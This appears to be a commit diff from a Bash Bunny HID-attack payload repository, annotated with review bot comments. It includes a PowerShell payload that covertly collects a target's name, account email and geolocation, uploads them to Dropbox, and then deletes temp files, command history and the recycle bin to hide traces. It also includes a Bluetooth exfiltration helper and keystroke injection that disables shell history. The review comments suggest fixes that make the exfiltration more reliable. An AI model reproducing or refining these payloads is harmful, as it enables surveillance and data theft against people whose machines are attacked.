||||
"DOWNARROW": "00,00,51",
|
||||
"DOWN": "00,00,51",
|
||||
"UPARROW": "00,00,52",
|
||||
"UP": "00,00,52",
|
||||
"NUMLOCK": "00,00,53",
|
||||
"MENU": "00,00,65",
|
||||
"APP": "00,00,65"
|
||||
}
|
|
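Review bot: there is no `"_"` entry in this layout, so any `Q STRING` containing an underscore cannot be typed. On a JIS keyboard `\`/`_` sit on the International1 key (usage 0x87) and `¥`/`|` on International3 (0x89), neither of which is mapped here, while `"\\": "00,00,31"` and `"|": "02,00,31"` use usage 0x31, which under a Japanese OS layout typically renders as the `]`/`}` key (the same key as the `"]": "00,00,32"` entry); verify `\`, `|` and `_` on a real JIS target before merging. Minor: `0B`, `0C`, `0E` are the only uppercase hex values in the layout files; harmless if the loader parses hex, but keep them lowercase for consistency with the rest.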
@ -43,6 +43,9 @@
|
|||
"x":"00,00,1b",
|
||||
"y":"00,00,1c",
|
||||
"z":"00,00,1d",
|
||||
"æ":"00,00,34",
|
||||
"ø":"00,00,33",
|
||||
"å":"00,00,2f",
|
||||
"1":"00,00,1e",
|
||||
"2":"00,00,1f",
|
||||
"3":"00,00,20",
|
||||
|
@ -131,6 +134,9 @@
|
|||
"X":"02,00,1b",
|
||||
"Y":"02,00,1c",
|
||||
"Z":"02,00,1d",
|
||||
"Æ":"02,00,34",
|
||||
"Ø":"02,00,33",
|
||||
"Å":"02,00,2f",
|
||||
"!":"02,00,1e",
|
||||
"\"":"02,00,1f",
|
||||
"#":"02,00,20",
|
||||
|
|
|
@ -0,0 +1,173 @@
|
|||
{
|
||||
"__comment": "All numbers here are in hex format and 0x is ignored.",
|
||||
"__comment": " ",
|
||||
"__comment": "This list is in ascending order of 3rd byte (HID Usage ID).",
|
||||
"__comment": " See section 10 Keyboard/Keypad Page (0x07)",
|
||||
"__comment": " of document USB HID Usage Tables Version 1.12.",
|
||||
"__comment": " ",
|
||||
"__comment": "Definition of these 3 bytes can be found",
|
||||
"__comment": " in section B.1 Protocol 1 (Keyboard)",
|
||||
"__comment": " of document Device Class Definition for HID Version 1.11",
|
||||
"__comment": " - byte 1: Modifier keys",
|
||||
"__comment": " - byte 2: Reserved",
|
||||
"__comment": " - byte 3: Keycode 1",
|
||||
"__comment": " ",
|
||||
"__comment": "Both documents can be obtained from link here",
|
||||
"__comment": " http://www.usb.org/developers/hidpage/",
|
||||
"__comment": " ",
|
||||
"__comment": "A = LeftShift + a, { = LeftShift + [",
|
||||
"__comment": " ",
|
||||
"CTRL": "01,00,00",
|
||||
"CONTROL": "01,00,00",
|
||||
"SHIFT": "02,00,00",
|
||||
"ALT": "04,00,00",
|
||||
"GUI": "08,00,00",
|
||||
"WINDOWS": "08,00,00",
|
||||
"CTRL-ALT": "05,00,00",
|
||||
"CTRL-SHIFT": "03,00,00",
|
||||
"ALT-SHIFT": "06,00,00",
|
||||
"__comment": "Below 5 key combinations are for Mac OSX",
|
||||
"__comment": "Example: (COMMAND-OPTION SHIFT t) to open terminal",
|
||||
"COMMAND": "08,00,00",
|
||||
"COMMAND-CTRL": "09,00,00",
|
||||
"COMMAND-CTRL-SHIFT": "0B,00,00",
|
||||
"COMMAND-OPTION": "0C,00,00",
|
||||
"COMMAND-OPTION-SHIFT": "0E,00,00",
|
||||
"a": "00,00,04",
|
||||
"A": "02,00,04",
|
||||
"b": "00,00,05",
|
||||
"B": "02,00,05",
|
||||
"c": "00,00,06",
|
||||
"C": "02,00,06",
|
||||
"d": "00,00,07",
|
||||
"D": "02,00,07",
|
||||
"e": "00,00,08",
|
||||
"E": "02,00,08",
|
||||
"f": "00,00,09",
|
||||
"F": "02,00,09",
|
||||
"g": "00,00,0a",
|
||||
"G": "02,00,0a",
|
||||
"h": "00,00,0b",
|
||||
"H": "02,00,0b",
|
||||
"i": "00,00,34",
|
||||
"I": "02,00,0c",
|
||||
"j": "00,00,0d",
|
||||
"J": "02,00,0d",
|
||||
"k": "00,00,0e",
|
||||
"K": "02,00,0e",
|
||||
"l": "00,00,0f",
|
||||
"L": "02,00,0f",
|
||||
"m": "00,00,10",
|
||||
"M": "02,00,10",
|
||||
"n": "00,00,11",
|
||||
"N": "02,00,11",
|
||||
"o": "00,00,12",
|
||||
"O": "02,00,12",
|
||||
"p": "00,00,13",
|
||||
"P": "02,00,13",
|
||||
"q": "00,00,14",
|
||||
"Q": "02,00,14",
|
||||
"r": "00,00,15",
|
||||
"R": "02,00,15",
|
||||
"s": "00,00,16",
|
||||
"S": "02,00,16",
|
||||
"t": "00,00,17",
|
||||
"T": "02,00,17",
|
||||
"u": "00,00,18",
|
||||
"U": "02,00,18",
|
||||
"v": "00,00,19",
|
||||
"V": "02,00,19",
|
||||
"w": "00,00,1a",
|
||||
"W": "02,00,1a",
|
||||
"x": "00,00,1b",
|
||||
"X": "02,00,1b",
|
||||
"y": "00,00,1c",
|
||||
"Y": "02,00,1c",
|
||||
"z": "00,00,1d",
|
||||
"Z": "02,00,1d",
|
||||
"1": "00,00,1e",
|
||||
"!": "02,00,1e",
|
||||
"2": "00,00,1f",
|
||||
"@": "40,00,14",
|
||||
"3": "00,00,20",
|
||||
"#": "40,00,20",
|
||||
"4": "00,00,21",
|
||||
"$": "40,00,21",
|
||||
"5": "00,00,22",
|
||||
"%": "02,00,22",
|
||||
"6": "00,00,23",
|
||||
"^": "02,00,20",
|
||||
"7": "00,00,24",
|
||||
"&": "02,00,23",
|
||||
"8": "00,00,25",
|
||||
"*": "00,00,2d",
|
||||
"9": "00,00,26",
|
||||
"(": "02,00,25",
|
||||
"0": "00,00,27",
|
||||
")": "02,00,26",
|
||||
"ENTER": "00,00,28",
|
||||
"ESC": "00,00,29",
|
||||
"ESCAPE": "00,00,29",
|
||||
"BACKSPACE": "00,00,2a",
|
||||
"TAB": "00,00,2b",
|
||||
"ALT-TAB": "04,00,2b",
|
||||
"SPACE": "00,00,2c",
|
||||
" ": "00,00,2c",
|
||||
"-": "00,00,2e",
|
||||
"_": "02,00,2e",
|
||||
"=": "02,00,27",
|
||||
"+": "02,00,21",
|
||||
"[": "40,00,25",
|
||||
"{": "40,00,24",
|
||||
"]": "40,00,26",
|
||||
"}": "40,00,27",
|
||||
"\\": "40,00,2d",
|
||||
"|": "40,00,2e",
|
||||
";": "02,00,31",
|
||||
":": "02,00,38",
|
||||
"'": "02,00,1f",
|
||||
"\"": "00,00,35",
|
||||
"`": "40,00,31",
|
||||
"~": "40,00,30",
|
||||
",": "00,00,31",
|
||||
"<": "40,00,35",
|
||||
".": "00,00,38",
|
||||
">": "40,00,1e",
|
||||
"/": "02,00,24",
|
||||
"?": "02,00,2d",
|
||||
"CAPSLOCK": "00,00,39",
|
||||
"F1": "00,00,3a",
|
||||
"F2": "00,00,3b",
|
||||
"F3": "00,00,3c",
|
||||
"F4": "00,00,3d",
|
||||
"F5": "00,00,3e",
|
||||
"F6": "00,00,3f",
|
||||
"F7": "00,00,40",
|
||||
"F8": "00,00,41",
|
||||
"F9": "00,00,42",
|
||||
"F10": "00,00,43",
|
||||
"F11": "00,00,44",
|
||||
"F12": "00,00,45",
|
||||
"PRINTSCREEN":"00,00,46",
|
||||
"SCROLLLOCK": "00,00,47",
|
||||
"PAUSE": "00,00,48",
|
||||
"BREAK": "00,00,48",
|
||||
"INSERT": "00,00,49",
|
||||
"HOME": "00,00,4a",
|
||||
"PAGEUP": "00,00,4b",
|
||||
"DELETE": "00,00,4c",
|
||||
"DEL": "00,00,4c",
|
||||
"END": "00,00,4d",
|
||||
"PAGEDOWN": "00,00,4e",
|
||||
"RIGHTARROW": "00,00,4f",
|
||||
"RIGHT": "00,00,4f",
|
||||
"LEFTARROW": "00,00,50",
|
||||
"LEFT": "00,00,50",
|
||||
"DOWNARROW": "00,00,51",
|
||||
"DOWN": "00,00,51",
|
||||
"UPARROW": "00,00,52",
|
||||
"UP": "00,00,52",
|
||||
"NUMLOCK": "00,00,53",
|
||||
"MENU": "00,00,65",
|
||||
"APP": "00,00,65"
|
||||
}
|
|
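Review bot: `"i": "00,00,34"` at L3772 is wrong: every other lowercase letter maps to its own usage (`h` 0x0b, `j` 0x0d) and `"I": "02,00,0c"` already uses 0x0c, so it should be `"i": "00,00,0c"`; as written every lowercase `i` in a `Q STRING` presses the 0x34 key instead. Unlike the Hungarian file in this commit, this layout carries no `__comment` naming the language it implements, which makes the AltGr assignments (`"@": "40,00,14"`, `"[": "40,00,25"`, `"{": "40,00,24"`) impossible to check against a reference; add that comment and the author tag.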
@ -0,0 +1,16 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# BLE_EXFIL v1 by @drapl0n
|
||||
# Exfiltrate data(25 bytes) stored in "/loot/ble_exfil.txt" via BLE.
|
||||
# Usage: BLE_EXFIL
|
||||
|
||||
function BLE_EXFIL() {
|
||||
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
|
||||
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
|
||||
sleep 1
|
||||
text=$(cat /root/udisk/loot/ble_exfil.txt)
|
||||
exfil=${text:0:25}
|
||||
echo -n -e "AT+ADVDAT=$exfil" > /dev/ttyS1
|
||||
}
|
||||
|
||||
export -f BLE_EXFIL
|
|
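Review bot: the `stty -F /dev/ttyS1 ...` line is duplicated (L4161 and L4164), and the same init sequence is copy-pasted into WAIT_FOR_PRESENT and WAIT_FOR_NOTPRESENT in this commit; one shared helper would avoid three copies to keep in sync. `echo -n -e "AT+ADVDAT=$exfil"` interprets backslash escapes in the file contents, so a literal `\n` or `\x..` in the text is transformed before being written; `printf '%s' "AT+ADVDAT=$exfil" > /dev/ttyS1` sends it unchanged. The usage comment also promises 25 bytes, but `${text:0:25}` counts characters, so the two differ for non-ASCII text.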
@ -26,6 +26,10 @@ function GET() {
|
|||
[[ "${ScanForOS,,}" == *"linux"* ]] && export TARGET_OS='LINUX' && return
|
||||
export TARGET_OS='UNKNOWN'
|
||||
;;
|
||||
"BB_LABEL")
|
||||
export BB_LABEL=$(ls -l /dev/disk/by-label/ | awk '/nandf$/ { print $9 }')
|
||||
;;
|
||||
|
||||
esac
|
||||
}
|
||||
|
||||
|
|
|
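Review bot: `BB_LABEL` is derived by parsing `ls -l` output (`awk '/nandf$/ { print $9 }'`), which breaks for labels containing spaces (only the first word is kept, and udev writes such characters as `\x20` in the symlink name) and depends on the column layout of `ls -l`. Resolve the symlink instead, e.g. `for l in /dev/disk/by-label/*; do [ "$(readlink -f "$l")" = /dev/nandf ] && export BB_LABEL=$(basename "$l"); done`, and the quick-reference entry added for `$BB_LABEL` should say the variable is empty when no label points at the NAND device.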
@ -0,0 +1,30 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# LINUX_MOUNT v1 by @drapl0n
|
||||
# Auto mounts BashBunny on GNU/Linux systems.
|
||||
# NOTE: Mount path is stored in variable "lmnt".
|
||||
# Usage: LINUX_MOUNT - to automatically mount BashBunny.
|
||||
# LINUX_UMOUNT - to unmount mounted BashBunny.
|
||||
|
||||
function LINUX_MOUNT() {
|
||||
Q CTRL-ALT t
|
||||
Q DELAY 1000
|
||||
Q STRING unset HISTFILE
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
Q STRING disk='$(lsblk -fs | grep BashBunny | awk '\'{print\ '$1'}\'\)''
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
Q STRING udisksctl mount -b /dev/'$disk'
|
||||
Q ENTER
|
||||
Q DELAY 2000
|
||||
Q STRING lmnt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
}
|
||||
function LINUX_UMOUNT() {
|
||||
Q STRING udisksctl unmount -b /dev/'$disk'
|
||||
Q ENTER
|
||||
Q DELAY 1000
|
||||
}
|
||||
export -f LINUX_MOUNT LINUX_UMOUNT
|
|
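Review bot: the header says the mount path "is stored in variable lmnt", but `disk` and `lmnt` are assigned by keystrokes inside the target's terminal session, not in the payload's bash environment, so a payload cannot read `$lmnt` or `$disk` after calling `LINUX_MOUNT`; document that they exist only in that open terminal, and that `LINUX_UMOUNT` therefore only works from the same session because it retypes `/dev/'$disk'`. Also `lsblk | grep $disk | awk '{print $7}'` matches the device name as a substring (`sda` also matches `sda1`, `sda2`) and the `$7` column index shifts with lsblk versions; `lsblk -no MOUNTPOINT /dev/$disk` is more robust, and `lsblk -fs | grep BashBunny` can yield several lines if more than one node carries the label, which leaves `$disk` multi-line.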
@ -1,9 +1,8 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# WAIT v1 by @Hak5Darren
|
||||
# Waits blocks the payload from continuing until the switch position has changed
|
||||
# Pauses payload until the switch position has changed
|
||||
# Usage: WAIT
|
||||
|
||||
function WAIT() {
|
||||
GET SWITCH_POSITION
|
||||
TEST=$SWITCH_POSITION
|
||||
|
@ -13,5 +12,43 @@ function WAIT() {
|
|||
sleep 1
|
||||
done
|
||||
}
|
||||
|
||||
export -f WAIT
|
||||
|
||||
|
||||
# WAIT_FOR_LOOT v1 by Korben
|
||||
# WAIT_FOR_LOOT <file_path> (optional)<refresh interval in seconds>
|
||||
#
|
||||
# Example: WAIT_FOR_LOOT /root/loot/captured_keys.txt
|
||||
# Will return once /root/loot/captured_keys.txt exists
|
||||
# OR IF FILE ALREADY EXISTS
|
||||
# Will return once the file line count has increased
|
||||
|
||||
function WAIT_FOR_LOOT() {
|
||||
# Check for refresh interval override
|
||||
if [ -z "${2}" ]; then
|
||||
REFRESH_INTERVAL=1
|
||||
else
|
||||
REFRESH_INTERVAL=$2
|
||||
fi
|
||||
|
||||
if [ -f "${1}" ]; then
|
||||
# If file already exists wait for it to change size
|
||||
start_count=$(cat $1|wc -l)
|
||||
while [ $(cat $1|wc -l) -eq $start_count ]; do
|
||||
sleep $REFRESH_INTERVAL
|
||||
done
|
||||
else
|
||||
# File doesn't exist, wait for it to be created
|
||||
while [ ! -f "${1}" ]; do
|
||||
sleep $REFRESH_INTERVAL
|
||||
done
|
||||
fi
|
||||
}
|
||||
export -f WAIT_FOR_LOOT
|
||||
|
||||
# WAIT_FOR_TARGET_IP v1 by Hak5Darren
|
||||
# Pauses payload until target receives IP address
|
||||
function WAIT_FOR_TARGET_IP() {
|
||||
until [ ! -z $(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq) ]; do sleep 1; done
|
||||
}
|
||||
export -f WAIT_FOR_TARGET_IP
|
||||
|
|
|
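Review bot: `WAIT_FOR_TARGET_IP` tests `[ ! -z $(...) ]` with the command substitution unquoted, so as soon as the lease file holds two or more distinct addresses the expansion becomes several words, `[` fails with "too many arguments" (exit 2), and the `until` loop never terminates although a lease exists; use `until [ -n "$(grep '^lease' /var/lib/dhcp/dhcpd.leases)" ]; do sleep 1; done` (the `cat |` is redundant). In `WAIT_FOR_LOOT`, quote `$1` in the two `cat $1|wc -l` calls (`wc -l < "$1"`), and guard the `-eq` comparison: if the file disappears between the `-f` check and the loop, `$(cat ...)` expands to empty, `[` errors out and the loop exits early instead of waiting. The comment "wait for it to change size" should say line count, which is what the code measures.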
@ -0,0 +1,23 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# WAIT_FOR_NOTPRESENT v1 by @Hak5Darren
|
||||
# Pauses payload execution until specified bluetooth identifier IS NOT present
|
||||
# Usage: WAIT_FOR_NOTPRESENT devicename
|
||||
|
||||
function WAIT_FOR_NOTPRESENT() {
|
||||
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
|
||||
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
|
||||
sleep 1
|
||||
echo -n -e "AT+ROLE=2" > /dev/ttyS1
|
||||
echo -n -e "AT+RESET" > /dev/ttyS1
|
||||
while true; do
|
||||
timeout 5s cat /dev/ttyS1 > /tmp/bt_observation
|
||||
if grep -qao $1 /tmp/bt_observation; then
|
||||
echo "$1 found"
|
||||
else
|
||||
break
|
||||
fi
|
||||
done
|
||||
}
|
||||
|
||||
export -f WAIT_FOR_NOTPRESENT
|
|
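Review bot: `grep -qao $1 /tmp/bt_observation` passes the device name unquoted and as a regular expression, so a name with spaces or regex characters (`(`, `.`, `+`) is split or mismatched, and an empty `$1` matches every line so the loop never ends; use `grep -qaF -- "$1" /tmp/bt_observation` (`-o` does nothing under `-q`). The `stty` line is duplicated, and `AT+ROLE=2` and `AT+RESET` are written back-to-back with no delay; if the module expects a pause between commands, the role change may be lost before the reset.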
@ -0,0 +1,23 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# WAIT_FOR_PRESENT v1 by @Hak5Darren
|
||||
# Pauses payload execution until specified bluetooth identifier IS present
|
||||
# Usage: WAIT_FOR_PRESENT devicename
|
||||
|
||||
function WAIT_FOR_PRESENT() {
|
||||
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
|
||||
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
|
||||
sleep 1
|
||||
echo -n -e "AT+ROLE=2" > /dev/ttyS1
|
||||
echo -n -e "AT+RESET" > /dev/ttyS1
|
||||
while true; do
|
||||
timeout 5s cat /dev/ttyS1 > /tmp/bt_observation
|
||||
if grep -qao $1 /tmp/bt_observation; then
|
||||
break
|
||||
else
|
||||
echo "$1 not found"
|
||||
fi
|
||||
done
|
||||
}
|
||||
|
||||
export -f WAIT_FOR_PRESENT
|
|
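Review bot: same `grep -qao $1` issue as in WAIT_FOR_NOTPRESENT: quote the argument and match fixed strings (`grep -qaF -- "$1" /tmp/bt_observation`), since an empty or regex-bearing name gives false matches and `-o` is inert with `-q`. `echo "$1 not found"` inside the loop prints a line every 5 seconds for as long as the device is absent; drop it or gate it behind a debug variable. The `stty`/`AT+ROLE=2`/`AT+RESET` prologue is now copied into three extensions in this commit; factor it into one helper.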
@ -0,0 +1,154 @@
|
|||
|
||||
############################################################################################################################################################
|
||||
# | ___ _ _ _ # ,d88b.d88b #
|
||||
# Title : ET-Phone-Home | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
|
||||
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
|
||||
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
|
||||
# Category : Incident-Response | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
|
||||
# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
|
||||
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
|
||||
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
|
||||
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
|
||||
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
|
||||
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
|
||||
# # / \ / ~ \ #
|
||||
# github.com/I-Am-Jakoby # \ / \~ ~/ #
|
||||
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
|
||||
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
|
||||
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
|
||||
############################################################################################################################################################
|
||||
|
||||
<#
|
||||
.SYNOPSIS
|
||||
This script is meant to recover your device or as an advanced recon tactic to get sensitive info on your target
|
||||
|
||||
.DESCRIPTION
|
||||
This program is used to locate your stolen cable. Or perhaps locate your "stolen" cable if you left it as bait.
|
||||
This script will get the Name and email associated with the targets microsoft account
|
||||
Their geo-location will also be grabbed giving you the latitude and longitude of where your device was activated
|
||||
#>
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_Device-Location.txt"
|
||||
|
||||
# Your dropbox access token to exfiltrate information to
|
||||
|
||||
$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN"
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
function Get-fullName {
|
||||
|
||||
try {
|
||||
|
||||
$fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
|
||||
|
||||
}
|
||||
|
||||
# If no name is detected function will return $env:UserName
|
||||
|
||||
# Write Error is just for troubleshooting
|
||||
catch {Write-Error "No name was detected"
|
||||
return $env:UserName
|
||||
-ErrorAction SilentlyContinue
|
||||
}
|
||||
|
||||
return $fullName
|
||||
|
||||
}
|
||||
|
||||
$FN = Get-fullName
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
function Get-email {
|
||||
|
||||
try {
|
||||
|
||||
$email = GPRESULT -Z /USER $Env:username | Select-String -Pattern "([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})" -AllMatches;$email = ("$email").Trim()
|
||||
return $email
|
||||
}
|
||||
|
||||
# If no email is detected function will return backup message for sapi speak
|
||||
|
||||
# Write Error is just for troubleshooting
|
||||
catch {Write-Error "An email was not found"
|
||||
return "No Email Detected"
|
||||
-ErrorAction SilentlyContinue
|
||||
}
|
||||
}
|
||||
|
||||
$EM = Get-email
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
function Get-GeoLocation{
|
||||
try {
|
||||
Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace
|
||||
$GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object
|
||||
$GeoWatcher.Start() #Begin resolving current locaton
|
||||
|
||||
while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {
|
||||
Start-Sleep -Milliseconds 100 #Wait for discovery.
|
||||
}
|
||||
|
||||
if ($GeoWatcher.Permission -eq 'Denied'){
|
||||
Write-Error 'Access Denied for Location Information'
|
||||
} else {
|
||||
$GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results.
|
||||
}
|
||||
}
|
||||
# Write Error is just for troubleshooting
|
||||
catch {Write-Error "No coordinates found"
|
||||
return "No Coordinates found"
|
||||
-ErrorAction SilentlyContinue
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
$GL = Get-GeoLocation
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
echo $FN >> $env:TMP\$FileName
|
||||
echo $EM >> $env:TMP\$FileName
|
||||
echo $GL >> $env:TMP\$FileName
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
# Upload output file to dropbox
|
||||
|
||||
$TargetFilePath="/$FileName"
|
||||
$SourceFilePath="$env:TMP\$FileName"
|
||||
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
|
||||
$authorization = "Bearer " + $DropBoxAccessToken
|
||||
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
|
||||
$headers.Add("Authorization", $authorization)
|
||||
$headers.Add("Dropbox-API-Arg", $arg)
|
||||
$headers.Add("Content-Type", 'application/octet-stream')
|
||||
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This is to clean up behind you and remove any evidence to prove you were there
|
||||
#>
|
||||
|
||||
# Delete contents of Temp folder
|
||||
|
||||
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
|
||||
|
||||
# Delete run box history
|
||||
|
||||
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
|
||||
|
||||
# Delete powershell history
|
||||
|
||||
Remove-Item (Get-PSreadlineOption).HistorySavePath
|
||||
|
||||
# Deletes contents of recycle bin
|
||||
|
||||
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
|
|
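Review bot: the Dropbox upload is never checked before the clean-up wipes the only copy of the loot. `Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers` has no try/catch, and `rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue` then deletes `$env:TMP\$FileName` whether or not the POST succeeded, so an offline target or a revoked token yields nothing at all. Delete the file only after a successful upload, or also drop a copy in the Bunny's loot folder the way Credz-Plz.ps1 in this same commit does. Two smaller defects in Get-fullName: `("$fullName").TrimStart("Full Name")` trims any leading characters drawn from the set F, u, l, N, a, m, e and space rather than the literal prefix, so a name such as "mark" comes back as "rk"; use `-replace '^Full Name\s*', ''`. And the bare line `-ErrorAction SilentlyContinue` after `return $env:UserName` in the catch block (repeated in Get-email and Get-GeoLocation) is unreachable and is not an argument to anything; remove it. Finally, `$DropBoxAccessToken` is a long-lived write token stored in plaintext on the Bunny's mass-storage partition, so whoever picks up the device can read and use it; that trade-off should at least be called out in the header comment.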
@ -0,0 +1,117 @@
|
|||
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
|
||||
|
||||
<!-- TABLE OF CONTENTS -->
|
||||
<details>
|
||||
<summary>Table of Contents</summary>
|
||||
<ol>
|
||||
<li><a href="#Description">Description</a></li>
|
||||
<li><a href="#getting-started">Getting Started</a></li>
|
||||
<li><a href="#Contributing">Contributing</a></li>
|
||||
<li><a href="#Version-History">Version History</a></li>
|
||||
<li><a href="#Contact">Contact</a></li>
|
||||
<li><a href="#Acknowledgments">Acknowledgments</a></li>
|
||||
</ol>
|
||||
</details>
|
||||
|
||||
# ET Phone Home
|
||||
|
||||
A script I put together to locate your stolen devices, or your "stolen" baited devices
|
||||
|
||||
## Description
|
||||
|
||||
This program is meant to locate your devices. When someone plugs it into their computer
|
||||
Using a one liner in the run box a script will be downloaded and executed that grabs the Name and email of the associated microsoft account and the
|
||||
latitude and longitude of where the device was activated. This information is stored in a text document that is then uploaded to your dropbox.
|
||||
Finally the end of the script will delete the runbox and powershell history and delete the files in the TMP Folder and Recycle Bin.
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* DropBox - Your Shared link for the intended file
|
||||
* Windows 7,10,11
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
### Executing program
|
||||
|
||||
* Your device is plugged into the targets computer
|
||||
* A one liner command in the run box will execute the script on the bash bunny
|
||||
Something Like What you see below will be in your loot folder:
|
||||
|
||||
NAME
|
||||
|
||||
EMAIL
|
||||
|
||||
LATITUDE AND LONGITUDE
|
||||
|
||||
```
|
||||
Jakoby
|
||||
|
||||
jakoby@example.com
|
||||
|
||||
Latitude Longitude
|
||||
-------- ---------
|
||||
37.778919 -122.416313
|
||||
```
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Contributing
|
||||
|
||||
All contributors names will be listed here
|
||||
|
||||
I am Jakoby
|
||||
|
||||
Kalani
|
||||
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Version History
|
||||
|
||||
* 0.1
|
||||
* Initial Release
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- CONTACT -->
|
||||
## Contact
|
||||
|
||||
<div><h2>I am Jakoby</h2></div>
|
||||
<p><br/>
|
||||
|
||||
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
|
||||
|
||||
<a href="https://github.com/I-Am-Jakoby/">
|
||||
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
|
||||
</a>
|
||||
|
||||
<a href="https://www.instagram.com/i_am_jakoby/">
|
||||
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
|
||||
</a>
|
||||
|
||||
<a href="https://twitter.com/I_Am_Jakoby/">
|
||||
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
|
||||
</a>
|
||||
|
||||
<a href="https://www.youtube.com/c/IamJakoby/">
|
||||
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
|
||||
</a>
|
||||
|
||||
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-ET-Phone-Home)
|
||||
</p>
|
||||
|
||||
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- ACKNOWLEDGMENTS -->
|
||||
## Acknowledgments
|
||||
|
||||
* [Hak5](https://hak5.org/)
|
||||
* [MG](https://github.com/OMG-MG)
|
||||
|
||||
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
|
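Review bot: the Dependencies and Description do not match the payload that ships in this directory. `* DropBox - Your Shared link for the intended file` describes a download link, but ET-Phone-Home.ps1 needs a Dropbox API access token (`$DropBoxAccessToken`) with write permission for its `files/upload` call, which is what the operator actually has to configure. `Using a one liner in the run box a script will be downloaded and executed` is wrong for the Bash Bunny version: payload.txt dot-sources `payloads\$SWITCH_POSITION\ET-Phone-Home.ps1` from the device's own storage and nothing is downloaded. `Something Like What you see below will be in your loot folder` is also inaccurate, since the script uploads to Dropbox and leaves nothing in the Bunny's loot folder. `* Windows 7,10,11` disagrees with `# Target: Windows 10, 11` in payload.txt; pick one. The Project Link `[https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-ET-Phone-Home)` mixes `[` with `)` and will not render as a link.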
@ -0,0 +1,22 @@
|
|||
